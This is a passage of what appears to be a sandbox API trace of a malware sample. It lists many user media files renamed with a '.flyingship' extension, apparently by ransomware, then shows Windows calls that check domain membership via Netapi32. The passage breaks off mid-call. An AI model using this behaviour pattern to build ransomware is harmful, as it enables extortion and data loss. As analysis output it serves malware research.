HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xhgr3.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ggHHL.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.flyingship.jpg\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.flyingship.jpg\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.flyingship.jpg\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.flyingship.jpg\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.flyingship.jpg\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.flyingship.jpg\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\zvOG.flyingship.jpg\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flyingship.flv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flyingship.flv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.flyingship.mkv\r\n") returned 1 [0259.264] SendMessageW (hWnd=0x40168, Msg=0xb1, wParam=0xf4240, lParam=0xf423f) returned 0x1 [0259.265] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd8040 | out: hHeap=0xbc0000) returned 1 [0259.265] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31fc8 | out: hHeap=0xbc0000) returned 1 [0259.265] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7f80 | out: hHeap=0xbc0000) returned 1 [0259.265] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe64ec8 | out: hHeap=0xbc0000) returned 1 [0259.265] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31ff8 | out: hHeap=0xbc0000) returned 1 [0259.265] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd8010 | out: hHeap=0xbc0000) returned 1 [0259.265] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7ef0 | out: hHeap=0xbc0000) returned 1 [0259.265] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe1fcf8 | out: hHeap=0xbc0000) returned 1 [0259.265] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.265] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe31ff8 [0259.265] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe31fc8 [0259.265] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fcf8 [0259.265] CharUpperBuffW (in: lpsz="DOMAINCHECK", cchLength=0xb | out: lpsz="DOMAINCHECK") returned 0xb [0259.265] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe1fcf8 | out: hHeap=0xbc0000) returned 1 [0259.265] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31fc8 | out: hHeap=0xbc0000) returned 1 [0259.265] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xdd7ef0 [0259.265] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xde54f8 [0259.265] PeekMessageW (in: lpMsg=0x7df994, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df994) returned 0 [0259.265] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe31fc8 [0259.265] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31fc8 | out: hHeap=0xbc0000) returned 1 [0259.265] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fcf8 [0259.265] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8010 [0259.265] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe31fc8 [0259.266] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd8010 | out: hHeap=0xbc0000) returned 1 [0259.266] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xe49db8 [0259.266] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8010 [0259.266] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fd48 [0259.266] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7f80 [0259.266] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe31fa8 [0259.266] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7f80 | out: hHeap=0xbc0000) returned 1 [0259.266] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xe49df0 [0259.266] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7f80 [0259.266] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fd70 [0259.266] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8040 [0259.266] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe31fd8 [0259.266] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd8040 | out: hHeap=0xbc0000) returned 1 [0259.266] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xe49e28 [0259.266] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8040 [0259.266] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1ff00 [0259.266] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8058 [0259.266] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32058 [0259.266] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd8058 | out: hHeap=0xbc0000) returned 1 [0259.266] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xe49e60 [0259.266] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8058 [0259.267] PeekMessageW (in: lpMsg=0x7df994, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df994) returned 0 [0259.267] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1feb0 [0259.267] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd80e8 [0259.267] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32048 [0259.267] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd80e8 | out: hHeap=0xbc0000) returned 1 [0259.267] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fdc0 [0259.267] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd80e8 [0259.267] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8130 [0259.267] PeekMessageW (in: lpMsg=0x7df994, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df994) returned 0 [0259.267] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32138 [0259.267] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32008 [0259.267] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xde5540 [0259.267] CharUpperBuffW (in: lpsz="_WINAPI_NETGETJOININFORMATION", cchLength=0x1d | out: lpsz="_WINAPI_NETGETJOININFORMATION") returned 0x1d [0259.267] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xde5540 | out: hHeap=0xbc0000) returned 1 [0259.267] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32008 | out: hHeap=0xbc0000) returned 1 [0259.267] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xdd8100 [0259.267] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32008 [0259.267] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8028 [0259.267] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32008 | out: hHeap=0xbc0000) returned 1 [0259.267] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fd98 [0259.267] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd80b8 [0259.267] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32008 [0259.267] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd80b8 | out: hHeap=0xbc0000) returned 1 [0259.267] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fe88 [0259.267] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd80b8 [0259.268] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd80d0 [0259.268] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xde5540 [0259.268] PeekMessageW (in: lpMsg=0x7df464, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df464) returned 0 [0259.268] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fe60 [0259.268] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd80a0 [0259.268] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe31fe8 [0259.268] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcb70 [0259.268] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcb58 [0259.268] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32068 [0259.268] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddcb58 | out: hHeap=0xbc0000) returned 1 [0259.268] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fed8 [0259.268] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcb58 [0259.268] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32018 [0259.268] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda620 [0259.268] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32018 | out: hHeap=0xbc0000) returned 1 [0259.268] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcb28 [0259.268] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32018 [0259.268] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcb40 [0259.268] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32018 | out: hHeap=0xbc0000) returned 1 [0259.268] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda5f0 [0259.268] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32018 [0259.268] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcaf8 [0259.269] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32018 | out: hHeap=0xbc0000) returned 1 [0259.269] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcb10 [0259.269] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32018 [0259.269] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda5c0 [0259.269] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32018 | out: hHeap=0xbc0000) returned 1 [0259.269] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcac8 [0259.269] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32018 [0259.269] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcae0 [0259.269] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32018 | out: hHeap=0xbc0000) returned 1 [0259.269] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda590 [0259.269] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32018 [0259.269] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddca98 [0259.269] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32018 | out: hHeap=0xbc0000) returned 1 [0259.269] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcab0 [0259.269] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32018 [0259.269] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda560 [0259.269] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32018 | out: hHeap=0xbc0000) returned 1 [0259.269] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddca68 [0259.269] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32018 [0259.269] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddca80 [0259.269] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32018 | out: hHeap=0xbc0000) returned 1 [0259.269] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xde5588 [0259.269] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe1fed8 | out: hHeap=0xbc0000) returned 1 [0259.270] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda530 [0259.270] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32018 [0259.270] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32018 | out: hHeap=0xbc0000) returned 1 [0259.270] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32018 [0259.270] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddca38 [0259.270] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0259.270] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddca50 [0259.270] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32ca8 [0259.270] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32c98 [0259.270] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda500 [0259.270] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddca50 | out: hHeap=0xbc0000) returned 1 [0259.270] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32ca8 | out: hHeap=0xbc0000) returned 1 [0259.270] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda500 | out: hHeap=0xbc0000) returned 1 [0259.270] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32c98 | out: hHeap=0xbc0000) returned 1 [0259.270] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fed8 [0259.270] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32c98 [0259.270] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda500 [0259.270] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32ca8 [0259.270] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32c88 [0259.270] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddca50 [0259.270] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda500 | out: hHeap=0xbc0000) returned 1 [0259.271] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32ca8 | out: hHeap=0xbc0000) returned 1 [0259.271] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddca50 | out: hHeap=0xbc0000) returned 1 [0259.271] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32c88 | out: hHeap=0xbc0000) returned 1 [0259.271] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32c88 [0259.271] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddca50 [0259.271] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32ca8 [0259.271] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32c78 [0259.271] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda500 [0259.271] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddca50 | out: hHeap=0xbc0000) returned 1 [0259.271] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32ca8 | out: hHeap=0xbc0000) returned 1 [0259.271] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda500 | out: hHeap=0xbc0000) returned 1 [0259.271] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32c78 | out: hHeap=0xbc0000) returned 1 [0259.271] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32c78 [0259.271] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda500 [0259.271] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32ca8 [0259.271] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32c68 [0259.271] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddca50 [0259.271] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda500 | out: hHeap=0xbc0000) returned 1 [0259.271] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32ca8 | out: hHeap=0xbc0000) returned 1 [0259.271] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddca50 | out: hHeap=0xbc0000) returned 1 [0259.271] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32c68 | out: hHeap=0xbc0000) returned 1 [0259.271] LoadLibraryW (lpLibFileName="Netapi32.dll") returned 0x744a0000 [0259.284] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc930 [0259.285] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32c68 [0259.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetGetJoinInformation", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 